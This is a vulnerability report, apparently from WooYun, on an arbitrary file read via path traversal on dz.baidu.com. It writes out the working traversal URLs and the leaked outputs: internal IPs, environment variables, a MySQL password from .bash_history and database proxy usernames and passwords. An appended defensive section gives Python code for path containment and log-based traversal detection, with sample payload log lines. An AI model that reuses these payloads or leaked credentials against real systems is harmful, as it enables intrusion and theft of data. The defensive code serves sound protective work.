WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online browsing -------- http://drop.zone.ci/
2016-03-29: Details have been sent to the vendor and are awaiting vendor handling
2016-03-29: Vendor has confirmed; details are disclosed to the vendor only
2016-04-08: Details disclosed to core white hats and experts in the relevant field
2016-04-18: Details disclosed to ordinary white hats
2016-04-28: Details disclosed to intern white hats
2016-05-13: Details disclosed to the public

Arbitrary file traversal on a Baidu site (leaks database account credentials and more)
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1
Arbitrary local files can be read.

DEVICE=eth1
BOOTPROTO=static
IPADDR=10.26.186.23
NETMASK=255.255.255.0
ONBOOT=yes

This gives the IP address 10.26.186.23. Next, read /proc/self/environ:

MANPATH=:/usr/share/baidu/man
HOSTNAME=tc-dev-light01.tc.baidu.com
TERM=linux
SHELL=/bin/bash
HISTSIZE=1000
SSH_CLIENT=10.48.50.43 43745 22
SSH_TTY=/dev/pts/0
USER=work
LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
SUDO_USER=zhaojianqi
SUDO_UID=194560
OPHOME=/home/op
OPTOOL=/home/op/opbin/optool
MAIL=/var/spool/mail/zhaojianqi
PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
PWD=/home/work/php/sbin
INPUTRC=/etc/inputrc
EDITOR=vim
LANG=en_US
SUDO_COMMAND=/bin/bash
SHLVL=5
HOME=/home/work
LOGNAME=work
SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
SUDO_GID=100000
G_BROKEN_FILENAMES=1
_=/home/work/php/bin/php-cgi
FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock

This gives the hostname: HOSTNAME=tc-dev-light01.tc.baidu.com. The .bash_history file exists:
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history
The command history leaks a MySQL password:
/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r --default-character-set=utf8
The source code also leaks database configuration, containing quite a few database passwords:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php

/**
 * Machine list of the DBProxy cluster, plus the username, password, port and retry count used to access it
 * @var array
 */
static $arrDBProxyServer = array(
    self::DBPROXY_OPENPLATFORM_INDEX => array( // open-platform dbproxy cluster
        'username' => 'developer_w',
        'password' => 'v60KOStx8cMQrv60',
        'port'     => 6014,
        'jx' => array(
            '10.46.7.20',
            '10.46.7.20',
        ),
        'tc' => array(
            '10.42.8.18',
            '10.42.8.18',
        ),
    ),
    self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array( // open-platform dbproxy cluster
        'username' => 'openplatform_r',
        'password' => 'oY3DHhmW1BFfkUYy',
        'port'     => 5352,
        'jx' => array(
            '10.202.95.49',
        ),
        'tc' => array(
            '10.202.95.49',
        ),
    ),

(the rest is omitted)

Handle the path correctly.
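The fix recommendation is one line, so as an added example (not code from the report or from Baidu) here is what "handle the path correctly" means in practice, together with a detector for the request shape this report shows. The traversal worked because backslash-separated `..` segments (`..\\\`) survived into a file read; the resolver below percent-decodes (repeatedly, to catch double encoding), folds backslashes into forward slashes, normalises, and then requires the result to still sit under the document root. `WEBROOT` is an assumed path (the report shows `/home/work/phpui/conf`, not the htdocs directory), and the log lines are constructed samples using documentation IP addresses.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical document root for the PHP front end (assumed; the report only
# shows /home/work/phpui/conf, not the htdocs directory).
WEBROOT = "/home/work/phpui/htdocs"


def _decode(path: str) -> str:
    """Percent-decode repeatedly (catches double encoding such as %252e) and
    fold backslashes into forward slashes, so backslash-separated '..'
    segments like the report's payload are seen as '../' before any check."""
    decoded = path
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded.replace("\\", "/")


def safe_resolve(webroot: str, requested: str) -> Optional[str]:
    """Return the absolute path for `requested` under `webroot`, or None when
    the request escapes the document root or carries a NUL byte."""
    decoded = _decode(requested)
    if "\x00" in decoded:  # NUL truncation trick against C-based file APIs
        return None
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # The decisive check: after normalisation the path must still start with
    # the document root. The trailing slash matters, otherwise '/x/htdocs2'
    # would pass as being inside '/x/htdocs'.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Combined-log-format line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal_attempt(request_path: str) -> bool:
    """True when the decoded request path contains a '..' segment."""
    return any(seg == ".." for seg in _decode(request_path).split("/"))


def flag_log_lines(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client IP, path, status) for every line that looks like a
    traversal attempt. A 200 on such a line means the read probably
    succeeded, which calls for incident handling rather than just blocking."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), m.group("status")))
    return hits


# Constructed sample log lines (not from the report); IPs are documentation
# addresses. The second line carries the exact path shape the report used.
SAMPLE_LOG = [
    r'198.51.100.9 - - [29/Mar/2016:10:00:00 +0800] "GET /en/index.php HTTP/1.1" 200 512',
    r'198.51.100.7 - - [29/Mar/2016:10:01:00 +0800] "GET /en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1 HTTP/1.1" 200 91',
    r'198.51.100.7 - - [29/Mar/2016:10:01:05 +0800] "GET /en/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/environ HTTP/1.1" 200 2048',
    r'198.51.100.8 - - [29/Mar/2016:10:02:00 +0800] "GET /en/%252e%252e/%252e%252e/home/work/.bash_history HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    print(safe_resolve(WEBROOT, "en/index.php"))
    report_shaped_path = SAMPLE_LOG[1].split('"')[1].split(" ")[1]
    print(safe_resolve(WEBROOT, report_shaped_path))  # None: escapes the root
    for hit in flag_log_lines(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

Note that `safe_resolve` still allows `en/../index.php`, which stays inside the root; the property enforced is containment after normalisation, not the absence of `..` in the raw string. The detector deliberately takes the opposite stance and flags any decoded `..` segment, since a legitimate client has little reason to send one.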
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-03-29 19:53
Thank you for your attention to Baidu security.
None